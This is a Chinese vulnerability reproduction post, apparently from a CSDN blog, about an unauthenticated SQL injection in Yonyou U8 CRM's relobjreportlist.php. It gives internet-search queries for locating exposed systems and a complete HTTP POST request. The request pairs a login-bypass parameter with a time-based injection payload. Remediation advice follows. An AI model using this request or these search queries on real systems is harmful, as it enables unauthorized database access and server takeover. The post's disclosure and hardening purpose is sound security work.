首页 > 数据库 >用友U8CRM relobjreportlist.php SQL注入漏洞复现

用友U8CRM relobjreportlist.php SQL注入漏洞复现

时间:2024-09-22 12:52:42浏览次数:11  
标签:语句 漏洞 用友 relobjreportlist SQL U8CRM CRM

0x01 漏洞描述:

        用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

        用友 U8 CRM客户关系管理系统relobjreportlist.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。

0x02 搜索语句:

Fofa:title="用友U8CRM"

Hunter:app.name="用友 CRM"

0x03 漏洞复现:

POST /config/relobjreportlist.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=bgsesstimeout-;

DontCheckLogin=1&Action=CheckRelUser&typeID=1&objType=1&ids=1');WAITFOR DELAY '0:0:5'--

 

0x04 修复建议:

  1. 使用预编译语句:采用参数化查询和预编译语句(如Prepared Statements),可以确保输入数据作为参数处理,从而避免直接插入到SQL语句中。

  2. 输入验证:对用户输入进行严格验证,确保只接收合法范围内的数据。可以使用白名单策略,过滤掉所有非法字符。

  3. 最小权限原则:数据库账户应仅授予执行所需操作的最低权限,避免使用高权限账户连接数据库。

  4. 错误信息处理:避免在前端展示详细的数据库错误信息,以免泄露系统结构和数据库信息。

  5. 使用Web应用防火墙(WAF):部署WAF可以实时监测和拦截可疑请求,提供第一道防线。

标签:语句,漏洞,用友,relobjreportlist,SQL,U8CRM,CRM
From: https://blog.csdn.net/xc_214/article/details/142435200

相关文章

  • 9.9付费进群系统 wxselect SQL注入漏洞复现
    0x01漏洞描述:2024年9.9付费进群Plus版系统是一种新的社群管理方式,用户通过支付9.9元人民币即可加入特定的微信群,享受群内提供的服务或资源。这种模式通常用于知识分享、资源下载、专业交流等社群,通过设置门槛来筛选成员,提高群组的专业性和互动质量。在位于/group/controlle......
  • Can't connect to local MySQL server through socket
    mysql-urootERROR2002(HY000):Can'tconnecttolocalMySQLserverthroughsocket'/tmp/mysql.sock'(2)这是mysql登录时找不到套接字的问题。首先需要明白的是,Linux端的mysqlserver启动时会开启一个socket,Linux上的MySQL的客户端在不使用IP连接时mysqlserver时,默认......
  • MySQL安装
    MySQL安装解压安装包在环境变量中写入解压后的路径点击确认即可写安装文件新建文件命名为my.ini,修改为自己安装路径即可[mysqld]#设置3306端口port=3306#设置mysql的安装目录----------是你的文件路径-------------basedir=E:\mysql-8.0.26-winx64#设......
  • 【看过来全网最细节】MySQL大数据量处理:全面优化方案与实践
    一、实施方案针对MySQL数据库数据量过大的问题,具体的实现细节可以包括以下几个方面:1.数据库分区(Partitioning)实现细节:选择分区类型:范围分区(RangePartitioning):适用于按时间范围或数值范围分区的场景。例如,按年份或月份将订单数据分区。列表分区(ListPartitioning):适用......
  • 一条 SQL 语句在 MySQL 中是如何执行的?
    本篇文章会分析下一个SQL语句在MySQL中的执行流程,包括SQL的查询在MySQL内部会怎么流转,SQL语句的更新是怎么完成的。在分析之前我会先带着你看看MySQL的基础架构,知道了MySQL由那些组件组成以及这些组件的作用是什么,可以帮助我们理解和解决这些问题。一MySQL基础架......
  • MySQL 数据库备份与恢复详解
    随着企业对数据依赖性的日益增加,确保数据库的安全与稳定至关重要。MySQL数据库作为开源数据库系统的代表,其备份与恢复能力直接关系到数据的安全性与业务的连续性。本文将结合最新的技术和工具,详细介绍MySQL的备份与恢复策略,帮助用户构建高效可靠的数据库管理方案。一、为什......
  • SQL 查询优化思路(行为表 t1 与业绩表 t2 关联):
    语句实例(行为表t1与业绩表t2关联):withtas( select行为id, t1.行为时间,t2.用户id,t2.业绩时间, row_number()over(partitionbyt1.用户idorderbyt1.行为时间desc)asrnkfrom行为表t1join业绩表t2ont1.用户id=......
  • MySQL学习
    一、Ubuntu环境下安装MySQL关于在Ubuntu22下安装MySQL5.7,我主要参考的是下面这几篇博客:Ubuntu22部署MySQL5.7详细教程_ubuntu22安装mysql5.7-CSDN博客Ubuntu安装和使用MySQL_奉君逍遥-CSDN开发云在配置文件中设置默认编码格式与存储引擎。打开配置文件sudovim/etc/mysql/mysql.c......
  • 基于SpringBoot+Vue+MySQL的手机销售管理系统
    系统展示用户前台界面管理员后台界面商家后台界面系统背景  随着智能手机的普及和市场竞争的日益激烈,手机销售行业面临着前所未有的挑战与机遇。传统的手工记录和简单的电子表格管理方式已难以满足现代手机销售业务的需求,销售数据的混乱和管理效率低......
  • 基于SpringBoot+Vue+MySQL的国产动漫网站
    系统展示用户前台界面管理员后台界面系统背景  随着国内动漫产业的蓬勃发展和互联网技术的快速进步,动漫爱好者们对高质量、个性化的国产动漫内容需求日益增长。然而,市场上现有的动漫平台大多以国外动漫为主,对国产动漫的推广和展示存在不足。为了填补这一空白......